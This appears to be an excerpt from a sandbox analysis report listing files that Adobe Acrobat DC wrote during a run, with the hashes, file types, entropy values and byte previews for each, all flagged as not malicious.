                                                                              MD5:F3961DD88A10768D06D13110951FF10E
                                                                              SHA1:6EAB7622C51BF9519483A04F2B1373827519A47E
                                                                              SHA-256:A0B74E21B2C2D0E8D17718D804A5ACF5323AB7048DE38AB589A1BA8D94963A8E
                                                                              SHA-512:5B83804182BCB613D786B00AFA695756F776ACDA80C3B59499D662D606870C31A1930997220AC32AFCFA39D7E5E8801E2DCFB4742B6218AA193631B24D663C68
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379112027780575","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":631241},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4320
                                                                              Entropy (8bit):5.258280338309441
                                                                              Encrypted:false
                                                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7gUjw/:etJCV4FiN/jTN/2r8Mta02fEhgO73go4
                                                                              MD5:9C837F09BC901AF489318040F1B8FE17
                                                                              SHA1:4903CA5A5CD0ED7E27D2E21E69C8208CF25554DF
                                                                              SHA-256:1708985407453F508B317E66E0BA17B4C38047C919AF7C3CC4F7219831341B78
                                                                              SHA-512:0B1DACDDA8CAB1B6E261461D99B3871525E58EF53E944C0DC9086805302ACE64F4A2C6178D28C13139392D24E90ACFFD43D8DF16BDB4AC6DE8C7A79E0F5676ED
                                                                              Malicious:false
                                                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):324
                                                                              Entropy (8bit):5.183654564518119
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcIx3+q2Pwkn2nKuAl9OmbzNMxIFUt8OPQct5Zmw+OPQcttVkwOwkn2nKuAl9c:7ocIsvYfHAa8jFUt8Ooct5/+OoctT5JH
                                                                              MD5:DE7EE5085CF1E2EF7D477800353A9EAA
                                                                              SHA1:F6E2DD6037E0F64EA93E1F5B66B688F65DB46818
                                                                              SHA-256:14EA582F29F5D04C1DD46D4968F381139FD0E09CEE022F1247B679C0612957CA
                                                                              SHA-512:59F4F0963AF68D119AA787A91FE51B4D22C7797DD21CDF54A56D392947E12865FD9A9AECE900ACCE7F9C8159F1A7F7D4B527DFB7B5A47F5BBF2B7BD9B54E3BAC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.799 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-15:00:18.800 1d98 Recovering log #3.2024/12/18-15:00:18.800 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):324
                                                                              Entropy (8bit):5.183654564518119
                                                                              Encrypted:false
                                                                              SSDEEP:6:7PQcIx3+q2Pwkn2nKuAl9OmbzNMxIFUt8OPQct5Zmw+OPQcttVkwOwkn2nKuAl9c:7ocIsvYfHAa8jFUt8Ooct5/+OoctT5JH
                                                                              MD5:DE7EE5085CF1E2EF7D477800353A9EAA
                                                                              SHA1:F6E2DD6037E0F64EA93E1F5B66B688F65DB46818
                                                                              SHA-256:14EA582F29F5D04C1DD46D4968F381139FD0E09CEE022F1247B679C0612957CA
                                                                              SHA-512:59F4F0963AF68D119AA787A91FE51B4D22C7797DD21CDF54A56D392947E12865FD9A9AECE900ACCE7F9C8159F1A7F7D4B527DFB7B5A47F5BBF2B7BD9B54E3BAC
                                                                              Malicious:false
                                                                              Preview:2024/12/18-15:00:18.799 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-15:00:18.800 1d98 Recovering log #3.2024/12/18-15:00:18.800 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241218200024Z-220.bmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                              Category:dropped
                                                                              Size (bytes):65110
                                                                              Entropy (8bit):1.1217569600910675
                                                                              Encrypted:false
                                                                              SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                              MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                              SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                              SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                              SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                              Malicious:false
                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                              Category:dropped
                                                                              Size (bytes):86016
                                                                              Entropy (8bit):4.444952385086047
                                                                              Encrypted:false
                                                                              SSDEEP:384:yezci5tOiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rhs3OazzU89UTTgUL
                                                                              MD5:5CC6C3C67173423B8666F96E02BC10A0
                                                                              SHA1:3E40B9EFBAACE254BCF3FADE8C783FBF2DD45230
                                                                              SHA-256:822DC333BB52E7EDD97C1E0E97293C097812CD40E1EEE22442B76948505AE27C
                                                                              SHA-512:3AB75F71E022EDC51432AC7AC628B27C4C77E962F85FCFA76303D832A8941F2FEF9D149DE194D458AD4C806E946B8748142532AA59CB7ACA98F12F1885DD8C88
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):3.774245922868084
                                                                              Encrypted:false
                                                                              SSDEEP:48:7Mtp/E2ioyVkioy9oWoy1Cwoy1sKOioy1noy1AYoy1Wioy1hioybioyyoy1noy1m:7GpjukFjXKQPNLb9IVXEBodRBkg
                                                                              MD5:7EAC1425DA6BE3F944EBB71D3F5A25D0
                                                                              SHA1:50B628DDFDB1CF0935915D5B05FC83417FED0212
                                                                              SHA-256:6BEB5ECD8F655225AC62D5515FC00DFD839451BB5994E28209FDE10557E8C16E
                                                                              SHA-512:212F87E6E1158915C7D970471C104B950DFF92E0A9BCFE57483EB31C6E7B5F891EC30F61CAE3D6A3152E6D09861AF2F5CC0B509E765682EBD974244B16D23406
                                                                              Malicious:false
                                                                              Preview:.... .c........m...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Certificate, Version=3
                                                                              Category:dropped
                                                                              Size (bytes):1391
                                                                              Entropy (8bit):7.705940075877404
                                                                              Encrypted:false
                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                              Malicious:false
                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):71954
                                                                              Entropy (8bit):7.996617769952133
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                              Malicious:false
                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):192
                                                                              Entropy (8bit):2.7673182398396405
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklNWOX+klfllXlE/HT8khhttNNX8RolJuRdxLlGB9lQRYwpDdt:kKPOrmT8Q3NMa8RdWBwRd
                                                                              MD5:CD5557CA251BAF39A484CB130E444D73
                                                                              SHA1:22CCF4A248BA7725EAA16C8D75D6877AA3DFC374
                                                                              SHA-256:4CA89A3BEC7A2910446F076E3317A3AC0B0E0431A8C5CE9676DC0593C394EAFE
                                                                              SHA-512:67FADB28A0769CB75BA3CD008AE00E0091052114C7CBCBD132F9474C4EBA9E1A43980F1726986CB62755057B1822FB628D0CA573734B9243F4F647CF27D0DF77
                                                                              Malicious:false
                                                                              Preview:p...... .........3.}.Q..(....................................................... ..........W....=s..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):328
                                                                              Entropy (8bit):3.2539954282295116
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKnc39UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/cGDImsLNkPlE99SNxAhUe/3
                                                                              MD5:BB58AA2BA906D546CBFF369C6682ABF0
                                                                              SHA1:31F1C621AB8047F2F153A5EDB667B90560222FC3
                                                                              SHA-256:E405141899099A7FA87FDF482FFFB7C78882F906C110ED219AAD7935FDC73978
                                                                              SHA-512:C0E0C2C6A84BECD4F47F0FADFBD95CF133BB3D920B77868FC3C2A9AA79565903E6D7A3ECA4A182232651AA8B5721DA01216705DF0D0C8639EC7D954B73245B41
                                                                              Malicious:false
                                                                              Preview:p...... ..........!..Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):1233
                                                                              Entropy (8bit):5.233980037532449
                                                                              Encrypted:false
                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7188

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):1233
                                                                              Entropy (8bit):5.233980037532449
                                                                              Encrypted:false
                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):1233
                                                                              Entropy (8bit):5.233980037532449
                                                                              Encrypted:false
                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):10880
                                                                              Entropy (8bit):5.214360287289079
                                                                              Encrypted:false
                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7188

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:PostScript document text
                                                                              Category:dropped
                                                                              Size (bytes):10880
                                                                              Entropy (8bit):5.214360287289079
                                                                              Encrypted:false
                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):295
                                                                              Entropy (8bit):5.379931544406748
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJM3g98kUwPeUkwRe9:YvXKXht8DZc0vnvGMbLUkee9
                                                                              MD5:A24382EC51084603DE7B7E5F1924E2A2
                                                                              SHA1:5606F2B519AD7EF260403004597E086C1F58A690
                                                                              SHA-256:8113D3B2711B1C5BEE9DF879AF6D8016A43D248B2D2885C6815FF3CA3F826565
                                                                              SHA-512:11DEAE164D23A99E01C251A4ED80B083754AE045BE870DD4544C1FF261D43726741531399768671FFCF0695AE5D70778E5A443DEA96F7CAC5A1458BCBC88D39A
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                              Download File
